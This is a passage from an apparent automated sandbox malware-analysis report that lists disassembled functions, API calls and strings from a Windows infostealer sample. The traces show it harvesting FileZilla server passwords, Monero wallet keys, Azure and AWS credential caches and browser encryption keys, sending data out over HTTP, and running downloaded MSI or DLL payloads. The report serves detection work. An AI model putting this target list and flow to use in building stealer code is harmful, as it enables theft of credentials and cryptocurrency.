                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00E30DBA,00E30DB7,00E30DB6,00E30DB3), ref: 00E20362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E20369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00E20385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00E203CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E203DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00E20419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E20463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E2051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E20532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E2054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E20562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00E20571
                                • lstrcat.KERNEL32(?,url: ), ref: 00E20580
                                • lstrcat.KERNEL32(?,00000000), ref: 00E20593
                                • lstrcat.KERNEL32(?,00E31678), ref: 00E205A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00E205B5
                                • lstrcat.KERNEL32(?,00E3167C), ref: 00E205C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00E205D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00E205E6
                                • lstrcat.KERNEL32(?,00E31688), ref: 00E205F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00E20604
                                • lstrcat.KERNEL32(?,00000000), ref: 00E20617
                                • lstrcat.KERNEL32(?,00E31698), ref: 00E20626
                                • lstrcat.KERNEL32(?,00E3169C), ref: 00E20635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB2), ref: 00E2068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 105d82da05ae2ec2b5991064d2e138ca85b669fa6ba72431d98fd43d3d2f8454
                                • Instruction ID: 668d35909f2fb92efaaae6b2c9a26bf1d80a0c947dd018a4520bf64b7d201abb
                                • Opcode Fuzzy Hash: 105d82da05ae2ec2b5991064d2e138ca85b669fa6ba72431d98fd43d3d2f8454
                                • Instruction Fuzzy Hash: 18D11172900218ABCB18EBF4ED9ADEE77B8FF54300F545528F502B7085DE75AA05CB61
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14839
                                  • Part of subcall function 00E147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14849
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E159F8
                                • StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E15A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E15B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,008FE5D0,00000000,?,008F9FF8,00000000,?,00E31A1C), ref: 00E15E71
                                • lstrlen.KERNEL32(00000000), ref: 00E15E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00E15E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E15E9A
                                • lstrlen.KERNEL32(00000000), ref: 00E15EAF
                                • lstrlen.KERNEL32(00000000), ref: 00E15ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E15EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00E15F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E15F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E15F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00E15FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00E15FBD
                                • HttpOpenRequestA.WININET(00000000,008FE550,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E15BF8
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • InternetCloseHandle.WININET(00000000), ref: 00E15FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 7d35bbfc326bdc5d61d19b5e95c9fed2c922752871bcdabf0c286eb6c95b18ef
                                • Instruction ID: c3f0bc5f589902016cde808b7b2fccacba6a8743b4be554eee3637f7fdd194f3
                                • Opcode Fuzzy Hash: 7d35bbfc326bdc5d61d19b5e95c9fed2c922752871bcdabf0c286eb6c95b18ef
                                • Instruction Fuzzy Hash: 79120172920128ABDB19EBA0EC99FEE73B8BF54700F5451A9F10673091DF702A49CF65
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E28B60: GetSystemTime.KERNEL32(00E30E1A,008FA028,00E305AE,?,?,00E113F9,?,0000001A,00E30E1A,00000000,?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E28B86
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E1D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E1D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D208
                                • lstrcat.KERNEL32(?,00E31478), ref: 00E1D217
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D22A
                                • lstrcat.KERNEL32(?,00E3147C), ref: 00E1D239
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D24C
                                • lstrcat.KERNEL32(?,00E31480), ref: 00E1D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D26E
                                • lstrcat.KERNEL32(?,00E31484), ref: 00E1D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D290
                                • lstrcat.KERNEL32(?,00E31488), ref: 00E1D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D2B2
                                • lstrcat.KERNEL32(?,00E3148C), ref: 00E1D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 00E1D2D4
                                • lstrcat.KERNEL32(?,00E31490), ref: 00E1D2E3
                                  • Part of subcall function 00E2A820: lstrlen.KERNEL32(00E14F05,?,?,00E14F05,00E30DDE), ref: 00E2A82B
                                  • Part of subcall function 00E2A820: lstrcpy.KERNEL32(00E30DDE,00000000), ref: 00E2A885
                                • lstrlen.KERNEL32(?), ref: 00E1D32A
                                • lstrlen.KERNEL32(?), ref: 00E1D339
                                  • Part of subcall function 00E2AA70: StrCmpCA.SHLWAPI(008F8980,00E1A7A7,?,00E1A7A7,008F8980), ref: 00E2AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 00E1D3B4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: d0c1c996a35a02831ea659f7ab12bdff4efff06423804b5f6f79c583c587f019
                                • Instruction ID: 98603760e6e917b905bc192cede0e3a4b7fffc9aa5e0feff08a3e5a2c23f1a7d
                                • Opcode Fuzzy Hash: d0c1c996a35a02831ea659f7ab12bdff4efff06423804b5f6f79c583c587f019
                                • Instruction Fuzzy Hash: E9E13372910218EBCB18EBA0ED9AEEE73B8BF54300F145168F147B7095DE35AE45CB61
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E2A920: lstrcpy.KERNEL32(00000000,?), ref: 00E2A972
                                  • Part of subcall function 00E2A920: lstrcat.KERNEL32(00000000), ref: 00E2A982
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                  • Part of subcall function 00E2A9B0: lstrlen.KERNEL32(?,008F8B80,?,\Monero\wallet.keys,00E30E17), ref: 00E2A9C5
                                  • Part of subcall function 00E2A9B0: lstrcpy.KERNEL32(00000000), ref: 00E2AA04
                                  • Part of subcall function 00E2A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,008FCF90,00000000,?,00E3144C,00000000,?,?), ref: 00E1CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E1CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00E1CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E1CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E1CAD9
                                • StrStrA.SHLWAPI(?,008FCE40,00E30B52), ref: 00E1CAF7
                                • StrStrA.SHLWAPI(00000000,008FCF30), ref: 00E1CB1E
                                • StrStrA.SHLWAPI(?,008FD758,00000000,?,00E31458,00000000,?,00000000,00000000,?,008F8970,00000000,?,00E31454,00000000,?), ref: 00E1CCA2
                                • StrStrA.SHLWAPI(00000000,008FD698), ref: 00E1CCB9
                                  • Part of subcall function 00E1C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C871
                                  • Part of subcall function 00E1C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C87C
                                • StrStrA.SHLWAPI(?,008FD698,00000000,?,00E3145C,00000000,?,00000000,008F89D0), ref: 00E1CD5A
                                • StrStrA.SHLWAPI(00000000,008F8B10), ref: 00E1CD71
                                  • Part of subcall function 00E1C820: lstrcat.KERNEL32(?,00E30B46), ref: 00E1C943
                                  • Part of subcall function 00E1C820: lstrcat.KERNEL32(?,00E30B47), ref: 00E1C957
                                  • Part of subcall function 00E1C820: lstrcat.KERNEL32(?,00E30B4E), ref: 00E1C978
                                • lstrlen.KERNEL32(00000000), ref: 00E1CE44
                                • CloseHandle.KERNEL32(00000000), ref: 00E1CE9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: 625701f6429e6530bab757ef33f6612e8e0ce0f3a2594f0dc8075cbd154bc1c6
                                • Instruction ID: 6e63e562a5a58f8eb6ea1cd82ddb7069776eb550ada0de4dfed5e94fce946b70
                                • Opcode Fuzzy Hash: 625701f6429e6530bab757ef33f6612e8e0ce0f3a2594f0dc8075cbd154bc1c6
                                • Instruction Fuzzy Hash: 7AE12172900118ABCB18EBA0EC95FEEB7B8BF54300F045169F10777191DF746A4ACB61
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • RegOpenKeyExA.ADVAPI32(00000000,008FABA0,00000000,00020019,00000000,00E305B6), ref: 00E283A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E28426
                                • wsprintfA.USER32 ref: 00E28459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E2848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00E28499
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 6343a5de609a5e8cf3f5709934b5488e3a894a7fcbed24cf8262bde53f008b82
                                • Instruction ID: e8922724ebb926f69e93992e6f630f99a1e70de8d676e8fe75f7c1e06470932e
                                • Opcode Fuzzy Hash: 6343a5de609a5e8cf3f5709934b5488e3a894a7fcbed24cf8262bde53f008b82
                                • Instruction Fuzzy Hash: AC811C7191122CEBDB28DF50DD95FEAB7B8BF48700F049299E10AA6140DF756B85CFA0
                                APIs
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24DB0
                                • lstrcat.KERNEL32(?,\.azure\), ref: 00E24DCD
                                  • Part of subcall function 00E24910: wsprintfA.USER32 ref: 00E2492C
                                  • Part of subcall function 00E24910: FindFirstFileA.KERNEL32(?,?), ref: 00E24943
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24E3C
                                • lstrcat.KERNEL32(?,\.aws\), ref: 00E24E59
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E30FDC), ref: 00E24971
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E30FE0), ref: 00E24987
                                  • Part of subcall function 00E24910: FindNextFileA.KERNEL32(000000FF,?), ref: 00E24B7D
                                  • Part of subcall function 00E24910: FindClose.KERNEL32(000000FF), ref: 00E24B92
                                • lstrcat.KERNEL32(?,00000000), ref: 00E24EC8
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00E24EE5
                                  • Part of subcall function 00E24910: wsprintfA.USER32 ref: 00E249B0
                                  • Part of subcall function 00E24910: StrCmpCA.SHLWAPI(?,00E308D2), ref: 00E249C5
                                  • Part of subcall function 00E24910: wsprintfA.USER32 ref: 00E249E2
                                  • Part of subcall function 00E24910: PathMatchSpecA.SHLWAPI(?,?), ref: 00E24A1E
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,008FE520), ref: 00E24A4A
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,00E30FF8), ref: 00E24A5C
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,?), ref: 00E24A70
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,00E30FFC), ref: 00E24A82
                                  • Part of subcall function 00E24910: lstrcat.KERNEL32(?,?), ref: 00E24A96
                                  • Part of subcall function 00E24910: CopyFileA.KERNEL32(?,?,00000001), ref: 00E24AAC
                                  • Part of subcall function 00E24910: DeleteFileA.KERNEL32(?), ref: 00E24B31
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 949356159-974132213
                                • Opcode ID: 92846b344cce0758d07f1fb971ee43f3d65af86c8f87ed8dfc24091327c460e3
                                • Instruction ID: 82c2df51fa419c6d029ea8c22178afee5b47b14dc6c96175a6d22f20b46b1854
                                • Opcode Fuzzy Hash: 92846b344cce0758d07f1fb971ee43f3d65af86c8f87ed8dfc24091327c460e3
                                • Instruction Fuzzy Hash: 2241B3BAA4031467D724F760EC4BFEE3678AB64700F005598B689760C1EEB557C8CB92
                                APIs
                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00E2906C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateGlobalStream
                                • String ID: image/jpeg
                                • API String ID: 2244384528-3785015651
                                • Opcode ID: ddd4d03104bd2ef521882d9576e14b8ae26005e28e844c16688b279770c2eae2
                                • Instruction ID: 585a660152dc93de8b63d298dd1fc3c889340a3bbccc31f070da51e80d13bc9f
                                • Opcode Fuzzy Hash: ddd4d03104bd2ef521882d9576e14b8ae26005e28e844c16688b279770c2eae2
                                • Instruction Fuzzy Hash: CC71F1B1A10318EBDB14DFE4E989FEEB7B9BF48300F105608F655A7284DB399945CB60
                                APIs
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E231C5
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E2335D
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00E234EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell$lstrcpy
                                • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                • API String ID: 2507796910-3625054190
                                • Opcode ID: 673f67c83e5314106056ff474715f81a7c0f0731bb3e6bd9cbed441b17a39375
                                • Instruction ID: 9b65b05f83109186f9e1980a1d2c21326b706a84987478a3463c40fa4588cf4b
                                • Opcode Fuzzy Hash: 673f67c83e5314106056ff474715f81a7c0f0731bb3e6bd9cbed441b17a39375
                                • Instruction Fuzzy Hash: D5122F729001289BDB1DEBA0EC96FDEB7B8AF54300F445169F50676092EF742B4ACF51
                                APIs
                                  • Part of subcall function 00E2A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E2A7E6
                                  • Part of subcall function 00E16280: InternetOpenA.WININET(00E30DFE,00000001,00000000,00000000,00000000), ref: 00E162E1
                                  • Part of subcall function 00E16280: StrCmpCA.SHLWAPI(?,008FE5C0), ref: 00E16303
                                  • Part of subcall function 00E16280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E16335
                                  • Part of subcall function 00E16280: HttpOpenRequestA.WININET(00000000,GET,?,008FDC58,00000000,00000000,00400100,00000000), ref: 00E16385
                                  • Part of subcall function 00E16280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00E163BF
                                  • Part of subcall function 00E16280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E163D1
                                  • Part of subcall function 00E2A8A0: lstrcpy.KERNEL32(?,00E30E17), ref: 00E2A905
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00E25318
                                • lstrlen.KERNEL32(00000000), ref: 00E2532F
                                  • Part of subcall function 00E28E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28E52
                                • StrStrA.SHLWAPI(00000000,00000000), ref: 00E25364
                                • lstrlen.KERNEL32(00000000), ref: 00E25383
                                • lstrlen.KERNEL32(00000000), ref: 00E253AE
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 3240024479-1526165396
                                • Opcode ID: 503b9ebb3012b3d3a18ebf863b2f6e4193fb315e4e2a74a54b2f0146cf9e3dc2
                                • Instruction ID: 19ce43659c56f0efc494395758cf87bc0b6e87e6dc17e2504d95681e73a7ca19
                                • Opcode Fuzzy Hash: 503b9ebb3012b3d3a18ebf863b2f6e4193fb315e4e2a74a54b2f0146cf9e3dc2
                                • Instruction Fuzzy Hash: E5511E719101589BCB1CFF60ED9AAEE77B9AF10300F546028F5067B192EF746B45CB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen
                                • String ID:
                                • API String ID: 2001356338-0
                                • Opcode ID: c3f78ac3485fbb0afbb0cde9ad1bd4fd58ef5040a900161bcd3c20920d2fe7c2
                                • Instruction ID: b3d385e1af9e795b6dc94092d7a15007572dc896d3f6c46abdbdd8977dfecf82
                                • Opcode Fuzzy Hash: c3f78ac3485fbb0afbb0cde9ad1bd4fd58ef5040a900161bcd3c20920d2fe7c2
                                • Instruction Fuzzy Hash: 97C1C5B69002289BCB18EF60EC89FEA73B8BF64304F0055D9F50A77141DB74AA85CF91
                                APIs
                                  • Part of subcall function 00E28DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00E242EC
                                • lstrcat.KERNEL32(?,008FDD30), ref: 00E2430B
                                • lstrcat.KERNEL32(?,?), ref: 00E2431F
                                • lstrcat.KERNEL32(?,008FCFA8), ref: 00E24333
                                  • Part of subcall function 00E2A740: lstrcpy.KERNEL32(00E30E17,00000000), ref: 00E2A788
                                  • Part of subcall function 00E28D90: GetFileAttributesA.KERNEL32(00000000,?,00E11B54,?,?,00E3564C,?,?,00E30E1F), ref: 00E28D9F
                                  • Part of subcall function 00E19CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00E19D39
                                  • Part of subcall function 00E199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E199EC
                                  • Part of subcall function 00E199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E19A11
                                  • Part of subcall function 00E199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00E19A31
                                  • Part of subcall function 00E199C0: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E19A5A
                                  • Part of subcall function 00E199C0: LocalFree.KERNEL32(00E1148F), ref: 00E19A90
                                  • Part of subcall function 00E199C0: CloseHandle.KERNEL32(000000FF), ref: 00E19A9A
                                  • Part of subcall function 00E293C0: GlobalAlloc.KERNEL32(00000000,00E243DD,00E243DD), ref: 00E293D3
                                • StrStrA.SHLWAPI(?,008FDD90), ref: 00E243F3
                                • GlobalFree.KERNEL32(?), ref: 00E24512
                                  • Part of subcall function 00E19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19AEF
                                  • Part of subcall function 00E19AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00E14EEE,00000000,?), ref: 00E19B01
                                  • Part of subcall function 00E19AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00E19B2A
                                  • Part of subcall function 00E19AC0: LocalFree.KERNEL32(?,?,?,?,00E14EEE,00000000,?), ref: 00E19B3F
                                • lstrcat.KERNEL32(?,00000000), ref: 00E244A3
                                • StrCmpCA.SHLWAPI(?,00E308D1), ref: 00E244C0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E244D2
                                • lstrcat.KERNEL32(00000000,?), ref: 00E244E5
                                • lstrcat.KERNEL32(00000000,00E30FB8), ref: 00E244F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_e10000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                • String ID:
                                • API String ID: 3541710228-0
                                • Opcode ID: 9ffbbcdf58be0babce4a6bd320f682b6c100971de00e354eaac46fe8e8bd5e10
                                • Instruction ID: f6d242e1193becf268423d4bd7c7490d5340775c5db3bfb300988d5adedf842c
                                • Opcode Fuzzy Hash: 9ffbbcdf58be0babce4a6bd320f682b6c100971de00e354eaac46fe8e8bd5e10
